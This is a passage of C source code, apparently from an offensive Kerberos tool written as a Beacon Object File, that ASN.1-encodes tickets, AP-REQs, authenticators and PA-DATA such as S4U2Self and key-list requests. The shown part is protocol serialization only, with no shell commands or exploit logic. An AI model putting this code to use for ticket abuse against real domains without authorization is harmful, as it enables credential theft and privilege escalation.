    AsnElt* strings = MemAlloc(sizeof(AsnElt) * cname->name_count);
    for (DWORD i = 0; i < cname->name_count; ++i) {
        AsnElt nameStringElt = { 0 }, nameStringEltContext = { 0 };
        if (MakeString(ASN_UTF8String, cname->name_string[i], &nameStringElt)) return true;
        if (MakeImplicit(ASN_UNIVERSAL, ASN_GeneralString, &nameStringElt, &nameStringEltContext)) return true;
        strings[i] = nameStringEltContext;
    }

    AsnElt stringSeq = { 0 }, stringSeq2 = { 0 }, stringSeq2Context = { 0 };
    if (Make3(ASN_SEQUENCE, strings, cname->name_count, &stringSeq)) return true;
    if (Make3(ASN_SEQUENCE, &stringSeq, 1, &stringSeq2)) return true;
    if (MakeImplicit(ASN_CONTEXT, 1, &stringSeq2, &stringSeq2Context)) return true;

    // build the final sequences
    AsnElt preseq[] = { nameTypeSeqContext, stringSeq2Context };
    AsnElt seq = { 0 };
    if (Make3(ASN_SEQUENCE, preseq, 2, &seq)) return true;
    if (Make3(ASN_SEQUENCE, &seq, 1, RET)) return true;
    return false;
}

bool AsnHostAddressEncode(HostAddress* addr, AsnElt* seq) {
    // addr-type[0] Int32
    // addr-string[1] OCTET STRING
    AsnElt addrTypeSeqContext = { 0 };
    if (PackIntegerLong(0, addr->addr_type, &addrTypeSeqContext)) return true;

    AsnElt addrStringSeqContext = { 0 };
    if( PackStringExt(1, ASN_TeletexString, ASN_OCTET_STRING, addr->addr_string, &addrStringSeqContext) ) return true;

    AsnElt seqTotal[] = { addrTypeSeqContext, addrStringSeqContext };
    if (Make3(ASN_SEQUENCE, seqTotal, 2, seq)) return true;

    return false;
}




bool AsnKerbPaPacRequestEncode(KERB_PA_PAC_REQUEST* value, AsnElt* totalSeq) {
    AsnElt ret;
    if (value->include_pac) {
        if (MakeBlob((const unsigned char[]) { 0x30, 0x05, 0xa0, 0x03, 0x01, 0x01, 0x01 }, 0, 7, & ret)) return true;
    }
    else {
        if (MakeBlob((const unsigned char[]) { 0x30, 0x05, 0xa0, 0x03, 0x01, 0x01, 0x00 }, 0, 7, & ret)) return true;
    }
    if (Make3(ASN_SEQUENCE, &ret, 1, totalSeq)) return true;

    return false;
}

bool AsnEncryptedDataEncode(EncryptedData* value, AsnElt* totalSeq) {
    // etype   [0] Int32 -- EncryptionType --,
    AsnElt etypeSeqContext = { 0 };
    if (PackIntegerLong(0, (long)value->etype, &etypeSeqContext)) return true;

    // cipher  [2] OCTET STRING -- ciphertext
    AsnElt cipherSeqContext = { 0 };
    if (PackBlock(2, value->cipher, value->cipher_size, &cipherSeqContext) ) return true;

    if (value->kvno != 0) {
        // kvno    [1] UInt32 OPTIONAL
        AsnElt kvnoSeqContext = { 0 };
        if (PackIntegerLong(1, (long)value->kvno, &kvnoSeqContext)) return true;

        AsnElt allSeq[] = { etypeSeqContext, kvnoSeqContext, cipherSeqContext };
        if (Make3(ASN_SEQUENCE, allSeq, 3, totalSeq))return true;
    }
    else {
        AsnElt allSeq[] = { etypeSeqContext, cipherSeqContext };
        if (Make3(ASN_SEQUENCE, allSeq, 2, totalSeq))return true;
    }
    return false;
}

bool AsnEncryptionKeyEncode(EncryptionKey* key, AsnElt* seq2) {
    // keytype[0] Int32 -- actually encryption type --
    AsnElt keyTypeSeqContext = { 0 };
    if (PackIntegerLong(0, (long)key->key_type, &keyTypeSeqContext)) return true;

    // keyvalue[1] OCTET STRING
    AsnElt blobSeqContext = { 0 };
    if (PackBlock(1, key->key_value, key->key_size, &blobSeqContext) ) return true;

    // build the final sequences (s)
    AsnElt seqTotal[] = { keyTypeSeqContext, blobSeqContext };
    AsnElt seq = { 0 };
    if (Make3(ASN_SEQUENCE, seqTotal, 2, &seq)) return true;
    if (Make3(ASN_SEQUENCE, &seq, 1, seq2)) return true;
    return false;
}

bool AsnTicketEncode(Ticket* ticket, AsnElt* totalSeq2Context) {
    // tkt-vno         [0] INTEGER (5)
    AsnElt tkt_vnoSeqContext = { 0 };
    if (PackIntegerLong(0, ticket->tkt_vno, &tkt_vnoSeqContext)) return true;

    // realm           [1] Realm
    AsnElt realmAsnSeqContext = { 0 };
    if( PackStringExt(1, ASN_IA5String, ASN_GeneralString, ticket->realm, &realmAsnSeqContext) ) return true;

    // sname           [2] PrincipalName
    AsnElt snameAsn = { 0 }, snameAsnContext = { 0 };
    if (AsnPrincipalNameEncode(&(ticket->sname), &snameAsn)) return true;
    if (MakeImplicit(ASN_CONTEXT, 2, &snameAsn, &snameAsnContext)) return true;

    // enc-part        [3] EncryptedData -- EncTicketPart
    AsnElt enc_partAsn = { 0 }, enc_partSeq = { 0 }, enc_partSeqContext = { 0 };
    if (AsnEncryptedDataEncode(&(ticket->enc_part), &enc_partAsn)) return true;
    if (Make3(ASN_SEQUENCE, &enc_partAsn, 1, &enc_partSeq)) return true;
    if (MakeImplicit(ASN_CONTEXT, 3, &enc_partSeq, &enc_partSeqContext)) return true;

    AsnElt seqTotal[] = { tkt_vnoSeqContext, realmAsnSeqContext, snameAsnContext, enc_partSeqContext };
    AsnElt totalSeq = { 0 }, totalSeq2 = { 0 };
    if (Make3(ASN_SEQUENCE, seqTotal, 4, &totalSeq)) return true;
    if (Make3(ASN_SEQUENCE, &totalSeq, 1, &totalSeq2)) return true;
    if (MakeImplicit(ASN_APPLICATION, 1, &totalSeq2, totalSeq2Context)) return true;

    return false;
}

bool AsnKDCReqBodyEncode(KDCReqBody* req_body, AsnElt* RET) {
    DWORD allNodesCount = 6;
    DWORD allNodesIndex = 0;
    if (req_body->cname.name_count)						allNodesCount++;
    if (req_body->rtime > 0)								allNodesCount++;
    if (req_body->addresses_count > 0)						allNodesCount++;
    if (req_body->enc_authorization_data.cipher_size > 0)	allNodesCount++;
    if (req_body->additional_tickets_count > 0)			allNodesCount++;
    AsnElt* allNodes = MemAlloc(sizeof(AsnElt) * allNodesCount);

    // kdc-options             [0] KDCOptions
    byte kdcOptionsBytes[sizeof(UINT32)];
    FlasToBytes(req_body->kdc_options, kdcOptionsBytes);

    AsnElt kdcOptionsSeqContext = { 0 };
    if (PackBitString(0, kdcOptionsBytes, sizeof(UINT32), &kdcOptionsSeqContext)) return true;
    allNodes[allNodesIndex] = kdcOptionsSeqContext; allNodesIndex++;

    // cname                   [1] PrincipalName
    if (req_body->cname.name_count) {
        AsnElt cnameElt = { 0 }, cnameEltContext = { 0 };
        if (AsnPrincipalNameEncode(&(req_body->cname), &cnameElt)) return true;
        if (MakeImplicit(ASN_CONTEXT, 1, &cnameElt, &cnameEltContext)) return true;
        allNodes[allNodesIndex] = cnameEltContext; allNodesIndex++;
    }

    // realm                   [2] Realm
    AsnElt realmSeqContext = { 0 };
    if( PackStringExt(2, ASN_IA5String, ASN_GeneralString, req_body->realm, &realmSeqContext) ) return true;
    allNodes[allNodesIndex] = realmSeqContext; allNodesIndex++;

    // sname                   [3] PrincipalName OPTIONAL
    AsnElt snameElt = { 0 }, snameEltContext = { 0 };
    if (AsnPrincipalNameEncode(&(req_body->sname), &snameElt)) return true;
    if (MakeImplicit(ASN_CONTEXT, 3, &snameElt, &snameEltContext)) return true;
    allNodes[allNodesIndex] = snameEltContext; allNodesIndex++;

    // from                    [4] KerberosTime OPTIONAL

    // till                    [5]
    char datatime[18];
    DateTime dt = GetLocalTimeAdd(req_body->till);
    MSVCRT$sprintf(datatime, "%04d%02d%02d%02d%02d%02dZ", dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second);

    AsnElt tillSeqContext = { 0 };
    if (PackString(5, ASN_GeneralizedTime, datatime, &tillSeqContext)) return true;
    allNodes[allNodesIndex] = tillSeqContext; allNodesIndex++;

    // rtime                   [6] KerberosTime
    if (req_body->rtime > 0) {
        char tilltime[18];
        dt = GetLocalTimeAdd(req_body->rtime);
        MSVCRT$sprintf(tilltime, "%04d%02d%02d%02d%02d%02dZ", dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second);


        AsnElt rtimeSeqContext = { 0 };
        if (PackString(6, ASN_GeneralizedTime, tilltime, &rtimeSeqContext)) return true;
        allNodes[allNodesIndex] = rtimeSeqContext; allNodesIndex++;
    }

    // nonce                   [7] UInt32
    AsnElt nonceSeqContext = { 0 };
    if (PackIntegerLong(7, (LONG)req_body->nonce, &nonceSeqContext)) return true;
    allNodes[allNodesIndex] = nonceSeqContext; allNodesIndex++;

    // etype                   [8] SEQUENCE OF Int32 -- EncryptionType -- in preference order --
    AsnElt* etypeList = MemAlloc(sizeof(AsnElt) * req_body->etypes_count);
    for (DWORD i = 0; i < req_body->etypes_count; ++i) {
        AsnElt etypeAsn = { 0 };
        if (MakeIntegerLong((LONG)req_body->etypes[i], &etypeAsn)) return true;
        etypeList[i] = etypeAsn;
    }
    AsnElt etypeSeqTotal1 = { 0 }, etypeSeqTotal2 = { 0 }, etypeSeqTotalContext = { 0 };
    if (Make3(ASN_SEQUENCE, etypeList, req_body->etypes_count, &etypeSeqTotal1)) return true;
    if (Make3(ASN_SEQUENCE, &etypeSeqTotal1, 1, &etypeSeqTotal2)) return true;
    if (MakeImplicit(ASN_CONTEXT, 8, &etypeSeqTotal2, &etypeSeqTotalContext)) return true;
    allNodes[allNodesIndex] = etypeSeqTotalContext; allNodesIndex++;

    // addresses               [9] HostAddresses OPTIONAL
    if (req_body->addresses_count > 0) {
        AsnElt* addrList = MemAlloc(sizeof(AsnElt) * req_body->addresses_count);
        for (int i = 0; i < req_body->addresses_count; i++) {
            AsnElt addrElt = { 0 };
            if (AsnHostAddressEncode(&(req_body->addresses[i]), &addrElt)) return false;
            addrList[i] = addrElt;
        }
        AsnElt addrSeqTotal1 = { 0 }, addrSeqTotal2 = { 0 }, addrSeqTotal2Context = { 0 };
        if (Make3(ASN_SEQUENCE, addrList, req_body->addresses_count, &addrSeqTotal1)) return true;
        if (Make3(ASN_SEQUENCE, &addrSeqTotal1, 1, &addrSeqTotal2)) return true;
        if (MakeImplicit(ASN_CONTEXT, 9, &addrSeqTotal2, &addrSeqTotal2Context)) return true;
        allNodes[allNodesIndex] = addrSeqTotal2Context; allNodesIndex++;
    }

    // enc-authorization-data  [10] EncryptedData OPTIONAL
    if (req_body->enc_authorization_data.cipher_size > 0) {
        AsnElt authorizationEncryptedDataASN = { 0 }, authorizationEncryptedDataSeq = { 0 }, authorizationEncryptedDataSeqContext = { 0 };
        if (AsnEncryptedDataEncode(&(req_body->enc_authorization_data), &authorizationEncryptedDataASN)) return true;
        if (Make3(ASN_SEQUENCE, &authorizationEncryptedDataASN, 1, &authorizationEncryptedDataSeq)) return true;
        if (MakeImplicit(ASN_CONTEXT, 10, &authorizationEncryptedDataSeq, &authorizationEncryptedDataSeqContext)) return true;
        allNodes[allNodesIndex] = authorizationEncryptedDataSeqContext; allNodesIndex++;
    }

    // additional-tickets      [11] SEQUENCE OF Ticket OPTIONAL
    if (req_body->additional_tickets_count > 0) {
        AsnElt ticketASN = { 0 }, ticketSeq = { 0 }, ticketSeq2 = { 0 }, ticketSeq2Context = { 0 };
        if (AsnTicketEncode(&(req_body->additional_tickets[0]), &ticketASN)) return true;
        if (Make3(ASN_SEQUENCE, &ticketASN, 1, &ticketSeq)) return true;
        if (Make3(ASN_SEQUENCE, &ticketSeq, 1, &ticketSeq2)) return true;
        if (MakeImplicit(ASN_CONTEXT, 11, &ticketSeq2, &ticketSeq2Context)) return true;
        allNodes[allNodesIndex] = ticketSeq2Context; allNodesIndex++;
    }

    if (Make3(ASN_SEQUENCE, allNodes, allNodesCount, RET)) return true;
    return false;
}

bool AsnChecksumEncode(Checksum* cksum, AsnElt* totalSeq2) {
    // cksumtype       [0] Int32
    AsnElt cksumtypeSeqContext = { 0 };
    if (PackIntegerLong(0, cksum->cksumtype, &cksumtypeSeqContext)) return true;

    // checksum        [1] OCTET STRING
    AsnElt checksumSeqContext = { 0 };
    if (PackBlock(1, cksum->checksum, cksum->checksum_length, &checksumSeqContext) ) return true;

    AsnElt seq[] = { cksumtypeSeqContext, checksumSeqContext };
    AsnElt totalSeq = { 0 };
    if (Make3(ASN_SEQUENCE, seq, 2, &totalSeq)) return true;
    if (Make3(ASN_SEQUENCE, &totalSeq, 1, totalSeq2)) return true;
    return false;
}

bool AsnAuthenticatorEncode(Authenticator* authenticator, AsnElt* finalContext) {
    DWORD allNodesCount = 5;
    DWORD allNodesIndex = 0;
    if (authenticator->cksum.checksum_length > 0)	allNodesCount++;
    if (authenticator->subkey.key_size)				allNodesCount++;
    if (authenticator->seq_number)					allNodesCount++;

    AsnElt* allNodes = MemAlloc(sizeof(AsnElt) * allNodesCount);

    // authenticator-vno       [0] INTEGER (5)
    AsnElt pvnoSeqContext = { 0 };
    if (PackIntegerLong(0, (long)authenticator->authenticator_vno, &pvnoSeqContext)) return true;
    allNodes[allNodesIndex] = pvnoSeqContext; allNodesIndex++;

    // crealm                  [1] Realm
    AsnElt prealmAsnSeqContext = { 0 };
    if( PackStringExt(1, ASN_IA5String, ASN_GeneralString, authenticator->crealm, &prealmAsnSeqContext) ) return true;
    allNodes[allNodesIndex] = prealmAsnSeqContext; allNodesIndex++;

    // cname                   [2] PrincipalName
    AsnElt snameElt = { 0 }, snameEltContext = { 0 };
    if (AsnPrincipalNameEncode(&(authenticator->cname), &snameElt)) return true;
    if (MakeImplicit(ASN_CONTEXT, 2, &snameElt, &snameEltContext)) return true;
    allNodes[allNodesIndex] = snameEltContext; allNodesIndex++;

    // cksum                    [3] Checksum
    if (authenticator->cksum.checksum_length > 0) {
        AsnElt checksumAsn = { 0 }, checksumAsnContext = { 0 };
        if (AsnChecksumEncode(&(authenticator->cksum), &checksumAsn)) return true;
        if (MakeImplicit(ASN_CONTEXT, 3, &checksumAsn, &checksumAsnContext)) return true;
        allNodes[allNodesIndex] = checksumAsnContext; allNodesIndex++;
    }

    // cusec                   [4] Microseconds
    AsnElt nonceSeqContext = { 0 };
    if (PackIntegerLong(4, (long)authenticator->cusec, &nonceSeqContext)) return true;
    allNodes[allNodesIndex] = nonceSeqContext; allNodesIndex++;

    // ctime                   [5] KerberosTime
    char datatime[18];
    MSVCRT$sprintf(datatime, "%04d%02d%02d%02d%02d%02dZ", authenticator->ctime.year, authenticator->ctime.month, authenticator->ctime.day, authenticator->ctime.hour, authenticator->ctime.minute, authenticator->ctime.second);
    AsnElt tillSeqContext = { 0 };
    if (PackString(5, ASN_GeneralizedTime, datatime, &tillSeqContext)) return true;
    allNodes[allNodesIndex] = tillSeqContext; allNodesIndex++;

    // subkey                  [6] EncryptionKey OPTIONAL
    if (authenticator->subkey.key_size) {
        AsnElt keyAsn = { 0 }, keyAsnContext = { 0 };
        if (AsnEncryptionKeyEncode(&(authenticator->subkey), &keyAsn)) return true;
        if (MakeImplicit(ASN_CONTEXT, 6, &keyAsn, &keyAsnContext)) return true;
        allNodes[allNodesIndex] = keyAsnContext; allNodesIndex++;
    }

    // seq-number              [7] UInt32 OPTIONAL
    if (authenticator->seq_number) {
        AsnElt seq_numberASN = { 0 }, seq_numberSeq = { 0 }, seq_numberSeqContext = { 0 };
        if (PackIntegerLong(7, (long)authenticator->seq_number, &seq_numberSeqContext)) return true;
        allNodes[allNodesIndex] = seq_numberSeqContext; allNodesIndex++;
    }

    AsnElt seq = { 0 };
    if (Make3(ASN_SEQUENCE, allNodes, allNodesCount, &seq)) return true;

    AsnElt finalAsn = { 0 };
    if (Make3(ASN_SEQUENCE, &seq, 1, &finalAsn))return true;
    if (MakeImplicit(ASN_APPLICATION, 2, &finalAsn, finalContext))return true;

    return false;
}

bool AsnApReqEncode(AP_REQ* value, AsnElt* totalSeqContext) {
    // pvno            [0] INTEGER (5)
    AsnElt pvnoSeqContext = { 0 };
    if (PackIntegerLong(0, (long)value->pvno, &pvnoSeqContext)) return true;

    // msg-type        [1] INTEGER (14)

    AsnElt msg_typeSeqContext = { 0 };
    if (PackIntegerLong(1, (long)value->msg_type, &msg_typeSeqContext)) return true;

    // ap-options      [2] APOptions
    byte ap_optionsBytes[sizeof(UINT32)];
    FlasToBytes(value->ap_options, ap_optionsBytes);
    AsnElt ap_optionsSeqContext = { 0 };
    if (PackBitString(2, ap_optionsBytes, sizeof(UINT32), &ap_optionsSeqContext)) return true;

    // ticket          [3] Ticket
    AsnElt ticketASN = { 0 }, ticktSeq = { 0 }, ticktSeqContext = { 0 };
    if (AsnTicketEncode(&(value->ticket), &ticketASN)) return true;
    if (Make3(ASN_SEQUENCE, &ticketASN, 1, &ticktSeq)) return true;
    if (MakeImplicit(ASN_CONTEXT, 3, &ticktSeq, &ticktSeqContext)) return true;

    // authenticator   [4] EncryptedData
    if (value->key.key_size == 0) {
        PRINT_OUT("[X] A key for the authenticator is needed to build an AP-REQ\n");
        return true;
    }

    AsnElt authenticatorAsn = { 0 };
    if (AsnAuthenticatorEncode(&(value->authenticator), &authenticatorAsn)) return true;

    byte* authenticatorBytes = NULL;
    int authenticatorBytesLength = 0;
    if (AsnToBytesEncode(&authenticatorAsn, &authenticatorBytesLength, &authenticatorBytes)) return true;

    byte* encBytes = NULL;
    if (encrypt(authenticatorBytes, authenticatorBytesLength, value->key.key_value, value->key.key_type, value->keyUsage, &encBytes, &authenticatorBytesLength)) return true;;

    EncryptedData authenticatorEncryptedData = { 0 };
    authenticatorEncryptedData.etype = value->key.key_type;
    authenticatorEncryptedData.cipher = encBytes;
    authenticatorEncryptedData.cipher_size = authenticatorBytesLength;

    AsnElt authenticatorEncryptedDataASN = { 0 }, authenticatorEncryptedDataSeq = { 0 }, authenticatorEncryptedDataSeqContext = { 0 };
    if (AsnEncryptedDataEncode(&authenticatorEncryptedData, &authenticatorEncryptedDataASN))return true;
    if (Make3(ASN_SEQUENCE, &authenticatorEncryptedDataASN, 1, &authenticatorEncryptedDataSeq)) return true;
    if (MakeImplicit(ASN_CONTEXT, 4, &authenticatorEncryptedDataSeq, &authenticatorEncryptedDataSeqContext)) return true;

    // encode it all into a sequence
    AsnElt totalAsn[] = { pvnoSeqContext , msg_typeSeqContext, ap_optionsSeqContext, ticktSeqContext, authenticatorEncryptedDataSeqContext };
    AsnElt seq = { 0 }, totalSeq = { 0 };
    if (Make3(ASN_SEQUENCE, totalAsn, 5, &seq)) return true;

    // AP-REQ          ::= [APPLICATION 14]
    //  put it all together and tag it with 14
    if (Make3(ASN_SEQUENCE, &seq, 1, &totalSeq)) return true;
    if (MakeImplicit(ASN_APPLICATION, 14, &totalSeq, totalSeqContext)) return true;

    return false;
}

bool AsnS4UUserIDEncode(S4UUserID* id, AsnElt* seqContext) {
    // nonce                   [0] UInt32
    AsnElt nonceSeqContext = { 0 };
    if (PackIntegerLong(0, id->nonce, &nonceSeqContext)) return true;

    // cname                   [1] PrincipalName
    AsnElt cnameElt = { 0 }, cnameEltContext = { 0 };
    if (AsnPrincipalNameEncode(&(id->cname), &cnameElt)) return true;
    if (MakeImplicit(ASN_CONTEXT, 1, &cnameElt, &cnameEltContext)) return true;

    // crealm                  [2] Realm
    AsnElt realmSeqContext = { 0 };
    if( PackStringExt(2, ASN_IA5String, ASN_GeneralString, id->crealm, &realmSeqContext) ) return true;

    // options                 [4] PA_S4U_X509_USER_OPTIONS
    byte optionsBytes[sizeof(UINT32)];
    FlasToBytes(id->options, optionsBytes);

    AsnElt optionsSeqContext = { 0 };
    if (PackBitString(4, optionsBytes, sizeof(UINT32), &optionsSeqContext)) return true;

    AsnElt allNodes[] = { nonceSeqContext, cnameEltContext, realmSeqContext, optionsSeqContext };
    if (Make3(ASN_SEQUENCE, allNodes, 4, seqContext)) return true;

    return false;
}

bool AsnPaPacOptionsEncode(PA_PAC_OPTIONS* value, AsnElt* seq) {
    AsnElt kerberosFlagsAsn = { 0 }, kerberosFlagsAsnContext = { 0 }, parent = { 0 };
    if (MakeBitString(value->kerberosFlags, 0, 4, &kerberosFlagsAsn)) return true;
    if (MakeImplicit(ASN_UNIVERSAL, 3, &kerberosFlagsAsn, &kerberosFlagsAsnContext)) return true;
    if (Make4(ASN_CONTEXT, 0, &kerberosFlagsAsnContext, 1, &parent)) return true;
    if (Make3(ASN_SEQUENCE, &parent, 1, seq)) return true;
    return false;
}

bool AsnPaS4USelfEnc(PA_FOR_USER* value, AsnElt* seq) {
    // userName[0] PrincipalName
    AsnElt userNameAsn = { 0 }, userNameAsnContext = { 0 };
    if (AsnPrincipalNameEncode(&(value->userName), &userNameAsn)) return true;
    if (MakeImplicit(ASN_CONTEXT, 0, &userNameAsn, &userNameAsnContext)) return true;

    // userRealm[1] Realm
    AsnElt userRealmSeqContext = { 0 };
    if( PackStringExt(1, ASN_IA5String, ASN_GeneralString, value->userRealm, &userRealmSeqContext) ) return true;

    // cksum[2] Checksum
    AsnElt checksumAsn = { 0 }, checksumAsnContext = { 0 };
    if (AsnChecksumEncode(&(value->cksum), &checksumAsn)) return true;
    if (MakeImplicit(ASN_CONTEXT, 2, &checksumAsn, &checksumAsnContext)) return true;

    // auth-package[3] KerberosString
    AsnElt auth_packageSeqContext = { 0 };
    if( PackStringExt(3, ASN_IA5String, ASN_GeneralString, value->auth_package, &auth_packageSeqContext) ) return true;

    AsnElt allSeq[] = { userNameAsnContext, userRealmSeqContext, checksumAsnContext, auth_packageSeqContext };
    if (Make3(ASN_SEQUENCE, allSeq, 4, seq)) return true;

    return false;
}

bool AsnPaS4Ux509UserEnc(PA_S4U_X509_USER* value, AsnElt* seq) {
    AsnElt userIDAsn = { 0 }, userIDSeq = { 0 }, userIDSeqContext = { 0 };
    if (AsnS4UUserIDEncode(&(value->user_id), &userIDAsn)) return true;
    if (Make3(ASN_SEQUENCE, &userIDAsn, 1, &userIDSeq)) return true;
    if (MakeImplicit(ASN_CONTEXT, 0, &userIDSeq, &userIDSeqContext)) return true;

    AsnElt checksumAsn = { 0 }, checksumAsnContext = { 0 };
    if (AsnChecksumEncode(&(value->cksum), &checksumAsn)) return true;
    if (MakeImplicit(ASN_CONTEXT, 1, &checksumAsn, &checksumAsnContext)) return true;

    AsnElt totalAsn[] = { userIDSeqContext, checksumAsnContext };
    if (Make3(ASN_SEQUENCE, totalAsn, 2, seq)) return true;

    return false;
}

bool AsnPaKeyListReqEncode(PA_KEY_LIST_REQ* value, AsnElt* seq) {
    AsnElt enctypeAsn = { 0 };
    if (MakeIntegerLong(value->Enctype, &enctypeAsn)) return true;
    if (Make3(ASN_SEQUENCE, &enctypeAsn, 1, seq)) return true;
    return false;
}

bool AsnPaDataEncode(PA_DATA padata, AsnElt* seq) {
    // padata-type     [1] Int32
    AsnElt nameTypeSeqContext = { 0 };
    if (PackIntegerLong(1, (long)padata.type, &nameTypeSeqContext)) return true;

    if (padata.type == PADATA_PA_PAC_REQUEST) {
        // used for AS-REQs
        AsnElt paDataElt = { 0 }, paDataEltContext = { 0 };
        if (AsnKerbPaPacRequestEncode(padata.value, &paDataElt)) return true;
        if (MakeImplicit(ASN_CONTEXT, 2, &paDataElt, &paDataEltContext)) return true;

        AsnElt seqSubs[] = { nameTypeSeqContext, paDataEltContext };
        if (Make3(ASN_SEQUENCE, seqSubs, 2, seq)) return true;
    }
    else if (padata.type == PADATA_ENC_TIMESTAMP) {
        // used for AS-REQs
        AsnElt encData = { 0 };
        if (AsnEncryptedDataEncode(padata.value, &encData)) return true;

        int encDataBytesSize = 0;
        byte* encDataBytes = 0;
        if (AsnToBytesEncode(&encData, &encDataBytesSize, &encDataBytes)) return true;

        AsnElt blobSeqContext = { 0 };
        if (PackBlock(2, encDataBytes, encDataBytesSize, &blobSeqContext) ) return true;

        AsnElt allSeq[] = { nameTypeSeqContext, blobSeqContext };
        if (Make3(ASN_SEQUENCE, allSeq, 2, seq)) return true;
    }
    else if (padata.type == PADATA_AP_REQ) {
        // used for TGS-REQs
        AsnElt encData = { 0 };
        if (AsnApReqEncode(padata.value, &encData)) return true;

        byte* encDataBytes = NULL;
        int   encDataBytesSize = 0;
        if (AsnToBytesEncode(&encData, &encDataBytesSize, &encDataBytes)) return true;

        AsnElt paDataElt = { 0 };
        if (PackBlock(2, encDataBytes, encDataBytesSize, &paDataElt) ) return true;

        AsnElt allSeq[] = { nameTypeSeqContext, paDataElt };
        if (Make3(ASN_SEQUENCE, allSeq, 2, seq)) return true;
    }
    else if (padata.type == PADATA_S4U2SELF) {
        // used for constrained delegation
        AsnElt encData = { 0 };
        if (AsnPaS4USelfEnc(padata.value, &encData)) return true;

        byte* encDataBytes = NULL;
        int   encDataBytesSize = 0;
        if (AsnToBytesEncode(&encData, &encDataBytesSize, &encDataBytes)) return true;

        AsnElt paDataElt = { 0 };
        if (PackBlock(2, encDataBytes, encDataBytesSize, &paDataElt) ) return true;

        AsnElt allSeq[] = { nameTypeSeqContext, paDataElt };
        if (Make3(ASN_SEQUENCE, allSeq, 2, seq)) return true;
    }
    else if (padata.type == PADATA_PA_S4U_X509_USER) {
        // used for constrained delegation
        AsnElt encData = { 0 };
        if (AsnPaS4Ux509UserEnc(padata.value, &encData)) return true;

        byte* encDataBytes = NULL;
        int   encDataBytesSize = 0;
        if (AsnToBytesEncode(&encData, &encDataBytesSize, &encDataBytes)) return true;

        AsnElt paDataElt = { 0 };
        if (PackBlock(2, encDataBytes, encDataBytesSize, &paDataElt) ) return true;

        AsnElt allSeq[] = { nameTypeSeqContext, paDataElt };
        if (Make3(ASN_SEQUENCE, allSeq, 2, seq)) return true;
    }
    else if (padata.type == PADATA_PA_PAC_OPTIONS) {
        AsnElt encData = { 0 };
        if (AsnPaPacOptionsEncode(padata.value, &encData)) return true;

        byte* encDataBytes = NULL;
        int   encDataBytesSize = 0;
        if (AsnToBytesEncode(&encData, &encDataBytesSize, &encDataBytes)) return true;

        AsnElt paDataElt = { 0 };
        if (PackBlock(2, encDataBytes, encDataBytesSize, &paDataElt) ) return true;

        AsnElt allSeq[] = { nameTypeSeqContext, paDataElt };
        if (Make3(ASN_SEQUENCE, allSeq, 2, seq)) return true;
    }
    else if (padata.type == PADATA_PK_AS_REQ) {
        PRINT_OUT("--- AsnPaDataEncode --- PADATA_PK_AS_REQ\n");
        //	AsnElt blob = AsnElt.MakeBlob(((PA_PK_AS_REQ)value).Encode().Encode());
        //	AsnElt blobSeq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[]{ blob });

        //	paDataElt = AsnElt.MakeImplicit(AsnElt.CONTEXT, 2, blobSeq);

        //	AsnElt seq = AsnElt.Make(AsnElt.SEQUENCE, new AsnElt[]{ nameTypeSeq, paDataElt });
        //	return seq;
    }
    else if (padata.type == PADATA_KEY_LIST_REQ) {
        AsnElt encData = { 0 };
        if (AsnPaKeyListReqEncode(padata.value, &encData)) return true;

        byte* encDataBytes = NULL;
        int   encDataBytesSize = 0;
        if (AsnToBytesEncode(&encData, &encDataBytesSize, &encDataBytes)) return true;

        AsnElt paDataElt = { 0 };
        if (PackBlock(2, encDataBytes, encDataBytesSize, &paDataElt) ) return true;

        AsnElt allSeq[] = { nameTypeSeqContext, paDataElt };
        if (Make3(ASN_SEQUENCE, allSeq, 2, seq)) return true;
    }
    else {
        return true;
    }
    return false;
}

bool AsnKrbCredInfoEncode(KrbCredInfo* cred_info, AsnElt* seq) {
    DWORD allNodesCount = 2;
    DWORD allNodesIndex = 0;
    if (cred_info->prealm)									allNodesCount++;
    if (cred_info->pname.name_count)						allNodesCount++;
    if (cred_info->authtime.isSet)							allNodesCount++;
    if (cred_info->starttime.isSet)							allNodesCount++;
    if (cred_info->endtime.isSet)							allNodesCount++;
    if (cred_info->renew_till.isSet)						allNodesCount++;
    if (cred_info->srealm)									allNodesCount++;
    if (cred_info->sname.name_count)						allNodesCount++;

    AsnElt* asnElements = MemAlloc(sizeof(AsnElt) * allNodesCount);

    // key             [0] EncryptionKey
    AsnElt keyAsn = { 0 }, keyAsnContext = { 0 };
    if (AsnEncryptionKeyEncode(&(cred_info->key), &keyAsn)) return true;
    if (MakeImplicit(ASN_CONTEXT, 0, &keyAsn, &keyAsnContext)) return true;
    asnElements[allNodesIndex] = keyAsnContext; allNodesIndex++;

    // prealm          [1] Realm OPTIONAL
    if (cred_info->prealm) {
        AsnElt prealmAsnSeqContext = { 0 };
        if( PackStringExt(1, ASN_IA5String, ASN_GeneralString, cred_info->prealm, &prealmAsnSeqContext) ) return true;
        asnElements[allNodesIndex] = prealmAsnSeqContext; allNodesIndex++;
    }

    // pname           [2] PrincipalName OPTIONAL
    if (cred_info->pname.name_count) {
        AsnElt pnameAsn = { 0 }, pnameAsnContext = { 0 };
        if (AsnPrincipalNameEncode(&(cred_info->pname), &pnameAsn)) return true;
        if (MakeImplicit(ASN_CONTEXT, 2, &pnameAsn, &pnameAsnContext)) return true;
        asnElements[allNodesIndex] = pnameAsnContext; allNodesIndex++;
    }

    // pname           [2] PrincipalName OPTIONAL
    byte flagBytes[sizeof(UINT32)];
    FlasToBytes(cred_info->flags, flagBytes);
    AsnElt flagBytesSeqContext = { 0 };
    if (PackBitString(3, flagBytes, sizeof(UINT32), &flagBytesSeqContext)) return true;
    asnElements[allNodesIndex] = flagBytesSeqContext; allNodesIndex++;

    // authtime        [4] KerberosTime OPTIONAL
    if (cred_info->authtime.isSet) {
        char datatime[18];
        MSVCRT$sprintf(datatime, "%04d%02d%02d%02d%02d%02dZ", cred_info->authtime.year, cred_info->authtime.month, cred_info->authtime.day, cred_info->authtime.hour, cred_info->authtime.minute, cred_info->authtime.second);
        AsnElt patimestampSeqContext = { 0 };
        if (PackString(4, ASN_GeneralizedTime, datatime, &patimestampSeqContext)) return true;
        asnElements[allNodesIndex] = patimestampSeqContext; allNodesIndex++;
    }

    // starttime       [5] KerberosTime OPTIONAL
    if (cred_info->starttime.isSet) {
        char datatime[18];
